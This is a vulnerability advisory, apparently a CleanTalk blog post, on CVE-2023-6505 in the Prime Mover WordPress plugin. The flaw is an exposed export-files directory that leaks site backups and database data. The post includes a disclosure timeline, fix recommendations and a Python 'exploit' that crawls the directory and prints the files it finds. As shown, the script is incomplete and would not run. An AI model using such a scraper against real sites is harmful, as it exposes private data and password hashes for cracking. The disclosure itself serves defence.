A critical vulnerability has been uncovered in the Prime Mover plugin, specifically within the directory http://your_site/wordpress/wp-content/uploads/prime-mover-export-files/1/. This vulnerability not only reveals comprehensive information about the site, including its configuration, directories, and files, but more critically, it grants unauthorized access to sensitive data within the database, presenting a significant security risk. The exploitation of this vulnerability could lead to potential brute force attacks on password hashes, posing an imminent threat to the compromise of the entire system.

Main info:

PluginPrime Mover < 1.9.3
CriticalSuper High
All Time160 361
Active installations8 000+
Publicly PublishedDecember 12, 2023
Last UpdatedDecember 12, 2023
ResearcherDmtirii Ignatyev
OWASP TOP-10A3: Sensitive Data Exposure
Reference https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6505
Plugin Security Certification by CleanTalk


November 24, 2023Plugin testing and vulnerability detection in the Prime Mover plugin have been completed
November 24, 2023I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
December 2, 2023The author fixed the vulnerability and released the plugin update
December 12, 2023Registered CVE-2023-6505

Discovery of the Vulnerability

A severe vulnerability has been discovered in the directory http://your_site/wordpress/wp-content/uploads/prime-mover-export-files/1/. This flaw not only exposes extensive information about the site, including its configuration, directories, and files, but more critically, it provides unauthorized access to sensitive data within the database and all data inside. Exploiting this vulnerability poses an imminent threat, leading to potential brute force attacks on password hashes and, subsequently, the compromise of the entire system.

Understanding of Directory Listing attack’s

Directory listing vulnerabilities involve the unintended exposure of directory contents, allowing unauthorized users to view files and directories. In WordPress, this could inadvertently reveal sensitive information, such as configuration details and file structures. Real-world examples highlight the risk of attackers leveraging such exposures to gain insights into the site’s infrastructure, potentially leading to unauthorized access and manipulation of sensitive data.

Exploiting the Directory Listing Vulnerability

Exploiting the vulnerability in Prime Mover involves utilizing the exposed directory to gain unauthorized access to sensitive data. Attackers may specifically target files containing password hashes, using this information to launch brute force attacks. Successful exploitation could lead to unauthorized access, manipulation of data, and other malicious activities, ultimately compromising the integrity and security of the entire system.


0) Go to packages and create new (If there is no backup now)

1) Go to this URL manualy – http://your_site/wordpress/wp-content/uploads/prime-mover-export-files/1/

2) Or you can use Exploit

EXPLOIT (python3):

import requests
from bs4 import BeautifulSoup
import re
import time

base_url = ""
processed_files = set()
processed_folders = set()

def get_file_names(url):
    response = requests.get(url)
    if response.status_code == 200 and len(response.text) > 0:
        soup = BeautifulSoup(response.text, 'html.parser')
        links = soup.find_all('a')
        file_names = []
        for link in links:
            file_name = link.get('href')
            if file_name != "../" and not file_name.startswith("?"):
        return file_names
    return []

def get_file_content(url, file_name):
    file_url = url + file_name
    # Игнорируем файлы, где в конце '.zip' или '.zip.*'
    if re.search(r'\.zip(?:\.|$)', file_name, re.IGNORECASE):
        print(f"Ignoring file: {file_name}")
        return None
    file_response = requests.get(file_url)
    if file_response.status_code == 200:
        return file_response.text
    return None

while True:
    folders = get_file_names(base_url)

    if folders:
        print("Folders on the page:")
        for folder_name in folders:
            if folder_name not in processed_folders:
                folder_url = base_url + folder_name
                files_in_folder = get_file_names(folder_url)
                if files_in_folder:
                    print("File names in the folder:")
                    for file_name in files_in_folder:
                        if file_name not in processed_files:
                            file_content = get_file_content(folder_url, file_name)
                            if file_content is not None:
                                print("File content:")



The potential risk associated with this vulnerability is severe. In real-world scenarios, attackers could exploit the exposed directory to conduct reconnaissance on the site’s structure, locate critical files, and access sensitive data within the database. This could lead to unauthorized access, data manipulation, and other malicious activities, jeopardizing the security of the entire system.

Recommendations for Improved Security

  • Directory Security Measures: Implement robust security measures for directories, including access controls and regular audits to detect and address vulnerabilities promptly.
  • Database Encryption: Employ encryption for sensitive data stored in the database to safeguard it even if unauthorized access occurs.
  • Plugin Update: Ensure that the Prime Mover plugin is regularly updated with the latest security patches to address this vulnerability.
  • Password Policy: Enforce strong password policies to minimize the risk of successful brute force attacks.

By implementing these security measures, administrators can significantly reduce the risk of unauthorized access and data exposure associated with the Prime Mover vulnerability.

#WordPressSecurity #DirectoryListing #WebsiteSafety #StayProtected #SuperHighVulnerability

Use CleanTalk solutions to improve the security of your website


Create your CleanTalk account

By signing up, you agree with license. Have an account? Log in.
CVE-2023-6505 – Prime Mover – Directory Listing to Account Takeover and Sensitive Data Exposure – POC/Exploit

Leave a Reply

Your email address will not be published. Required fields are marked *